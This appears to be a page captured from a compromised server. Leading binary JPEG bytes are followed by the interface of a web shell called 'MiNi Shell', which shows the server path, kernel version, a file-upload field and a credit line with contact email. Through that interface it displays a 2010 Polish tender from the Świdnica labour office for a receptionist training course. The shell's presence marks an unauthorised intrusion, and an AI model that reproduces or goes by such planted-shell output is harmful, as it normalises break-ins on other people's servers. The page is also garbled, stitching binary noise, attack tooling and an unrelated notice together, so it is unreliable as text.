JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100831/271352-N-2010.html

<p class="kh_header"><b>Świdnica: Zorganizowanie i przeprowadzenie szkolenia grupowego finansowanego ze środków Funduszu Pracy dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne.</b><br>
<b>Numer ogłoszenia: 271352 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. M. Skłodowskiej-Curie 5, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8561818, faks 074 8561813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia grupowego finansowanego ze środków Funduszu Pracy dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego w kierunku KURS RECEPCJONISTKI Z NAUKĄ JĘZYKA OBCEGO finansowanego ze środków Funduszu Pracy dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy. 

Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie miasta Świdnicy.

Szkolenie musi rozpocząć się w dniu 11.10.2010 r. oraz zakończyć w dniu 12.11.2010 r.

UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 7 dni kalendarzowych, jednakże wyłącznie przy zachowaniu wytycznych ujętych w INFORMACJACH UZUPEŁNIAJĄCYCH.

Program szkolenia powinien zawierać m.in. następujące zagadnienia:
1.		Rola i znaczenie recepcji w hotelu
2.		Organizacja pracy
3.		Savoir vivre
4.		Profesjonalna obsługa klienta przez telefon
5.		Psychologiczne aspekty obsługi gości hotelowych
6.		Etyka w zawodzie
7.		Techniki samoprezentacji
8.		Podstawy prawne dotyczące pracy w recepcji w zakładzie hotelarskim
9.		Język angielski dla początkujących
10.		Umiejętność poszukiwania i pozyskiwania zatrudnienia
Zagadnienia dotyczące szkolenia powinny być zgodne z wytycznymi Rady Europy zawartymi w Europejskim Systemie Opisu Kształcenia Językowego (poziom biegłości A1).

Minimalna ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Łączna liczba godzin na jednego uczestnika szkolenia: 180 godzin zegarowych, w tym:
a) zajęć teoretycznych: 150 godz. zegarowych, z czego 5 godz. zegarowych przypada na zajęcia z umiejętności poszukiwania zatrudnienia, a 60 godz. zegarowych na zajęcia z nauki języka obcego,
b) ćwiczeń: 30 godz. zegarowych.

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego. Jednakże, po wyłonieniu Wykonawcy szkolenia, Zamawiający (na podstawie przedłożonego harmonogramu) doliczy w umowie organizacji szkolenia do ilości godzin szkolenia czas, jaki Wykonawca założył na sposób sprawdzenia efektów szkolenia.
Wymagania:
Kurs przeznaczony jest dla osób:
1.	zarejestrowanych w tut. Urzędzie,
2.	posiadających status bezrobotnego,
3.	które mają ukończone 18 lat,
4.	z wykształceniem min. podstawowym.

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki.

Po zakończonym szkoleniu absolwent powinien m.in.:
a)	zorganizować sobie pracę w należyty sposób,
b)	fachowo prowadzić rozmowy z klientami,
c)	budować rzetelne relacje z klientami,
d)	obsługiwać gości przy ich przyjeździe i wyjeździe,
e)	sprawować opiekę nad gośćmi hotelowymi,
f)	służyć pomocą gościom hotelowym w trakcie ich pobytu w hotelu,
g)	znać podstawy języka angielskiego.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
odtwarzacz DVD lub magnetowid, telewizor, tematyczne filmy wideo lub płyty CD/DVD do zajęć, min. inne, w zależności od metod dobranych przez prowadzącego.

INFORMACJE UZUPEŁNIAJĄCE:
1)	Po ogłoszeniu wyników przetargu wyłoniony Wykonawca będzie zobowiązany do podpisania z Zamawiającym obu umów załączonych do wniosku o wszczęcie postępowania o zamówienie publiczne.
2)	Wykonawca wyda uczestnikom szkolenia zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki w terminie do 3 dni roboczych od daty zakończenia szkolenia.
3)	Wykonawca w trakcie trwania szkolenia musi zapewnić uczestnikom szkolenia warunki zgodne z przepisami bezpieczeństwa i higieny pracy.
4)	Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.
5)	Szkolenie musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu, przy czym liczba godzin szkolenia w miesiącu kalendarzowym przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż :
- 120 godzin zegarowych w pierwszym miesiącu szkolenia
- 60 godzin zegarowych w drugim miesiącu szkolenia.
6)	Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych).
zajęcia teoretyczne muszą rozpocząć się nie wcześniej niż o godz. 800, trwać nie krócej niż 6, a nie dłużej niż 8 godzin zegarowych dziennie oraz zakończyć się nie później niż o godz. 20.00 ( nie dotyczy modułu nauki języka obcego).             
ćwiczenia przypadające na jednego uczestnika szkolenia muszą rozpocząć się nie wcześniej niż o godz. 800, trwać nie krócej niż 6, a nie dłużej niż 8 godzin zegarowych dziennie oraz zakończyć się nie później niż o godz. 2000 ,
dzienna liczba godzin zegarowych - nie więcej niż 8. 
w przypadku modułu nauki języka obcego:
- zajęcia nie mogą się rozpocząć wcześniej niż o godzinie 800, trwać dłużej niż 5 godzin zegarowych dziennie i zakończyć się nie później niż o godzinie 2000,
- pomiędzy jednym dniem zajęć, a kolejnym musi być co najmniej 1 dzień przerwy.
Zamawiający dopuszcza:
- aby w dniu będącym przerwą od zajęć z modułu nauki języka obcego, odbywały się inne zajęcia tematyczne,
- możliwość łączenia w jednym dniu zajęć modułu nauki języka obcego z innymi modułami.

7)	 Każdy uczestnik szkolenia otrzyma na własność skrypt oraz podstawowe materiały piśmienne potrzebne do prowadzenia notatek ( zeszyt/notatnik, długopis).
8)	Wykonawca w dniu rozpoczęcia szkolenia, jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć.
9)	Wykonawca zapewni każdemu uczestnikowi szkolenia catering w postaci:
- ciepłych napoi (np. kawa, herbata),
- świeżych słodkich przekąsek (np. ciasteczka, słodkie bułki, itp.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają zaktualizowany na 2010 r., w Dziale 2 pt. Tematyka prowadzonych szkoleń w bieżącym roku kalendarzowym o dane szkolenie/a, na które Wykonawca zamierza złożyć ofertę, wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236, poz. 2365).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zorganizowali w okresie ostatnich 3 lat co najmniej 2 szkolenia grupowe ( za szkolenie grupowe uważa się szkolenie w którym uczestnicz co najmniej 8 osób).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują  pomieszczeniami wykładowymi, których liczba i pojemność jest adekwatna do liczby części, których dotyczy złożona oferta oraz uwzględnia wielkość grupy szkoleniowej danej części zamówienia, jak również harmonogram zajęć oraz  aby umożliwić uczestnikom szkolenia właściwe przygotowanie praktyczne Wykonawca musi zapewnić odpowiednią ilość sprzętów oraz materiałów niezbędnych do przeprowadzenia zajęć.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zajęcia teoretyczne, jak i praktyczne powinni prowadzić wykładowcy posiadający uprawnienia do wykonywania zawodu instruktora/wykładowcy. Osoby prowadzące zajęcia muszą posiadać odpowiednią wiedzę oraz przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Wykładowcy winni dysponować stosownymi dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy, itp.), które potwierdzą kwalifikacje i uprawnienia kadry szkoleniowej. Każdy wykładowca musi mieć doświadczenie praktyczne w zakresie prowadzonych zajęć tj. przeprowadziła co najmniej 2 szkolenia grupowe odpowiadające tematyce przedmiotu zamówienia w ciągu ostatnich 3 lat.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - certyfikat jakości usług lub inny dokument - 15</li>
<li>3 - kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - doświadczenie kadry dydaktycznej - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:
- gdy Zamawiającemu nie uda się skompletować pełnej grupy szkoleniowej osób uprawnionych do odbycia szkolenia - poprzez zmniejszenie liczby uczestników szkolenia do 20%,
- konieczności zmniejszenia przez Wykonawcę kwoty preliminowanych kosztów związanych 
z realizowanym zamówieniem,
- gdy Wykonawca uzasadni celowość i konieczność zwiększenia do 20% ilości zajęć praktycznych, kosztem zajęć teoretycznych, przy zachowaniu ogólnej ilości godzin każdej grupy szkoleniowej, pod warunkiem, że inne przepisy prawne dot. organizacji danego szkolenia nie stanowią inaczej,
- zmiany w wykazie osób, którymi dysponuje lub będzie dysponował Wykonawca. Zmiany te muszą wynikać z przyczyn niezależnych od wykonawcy, np. choroba osoby mającej prowadzić zajęcia. Zmiana może nastąpić wówczas, gdy nowa kadra dydaktyczna będzie posiadała stosowne uprawnienia do prowadzenia zajęć a także wykształcenie i doświadczenie zawodowe nie mniejsze od osoby zastępowanej, której dane zostały przekazane wraz z ofertą Zamawiającemu.
- Zmiany miejsca organizacji szkolenia z zachowaniem miasta Świdnica oraz zapisu § 4 pkt 7 umowy organizacji szkolenia.
?	Zmian w harmonogramie zajęć, które zostały zaakceptowane przez Zamawiającego.
- zmiany terminu realizacji zamówienia bądź wyznaczenia (w porozumieniu z Wykonawcą) dodatkowego terminu wykonania przedmiotu zamówienia, w sytuacji, gdy:
- niewykonanie zamówienia będzie spowodowane przyczynami niezależnymi od Wykonawcy (np. działania siły wyższej),
- pełna grupa szkoleniowa osób uprawnionych do odbycia szkolenia nie zostanie na czas skompletowana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.swidnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świdnicy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Świdnicy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com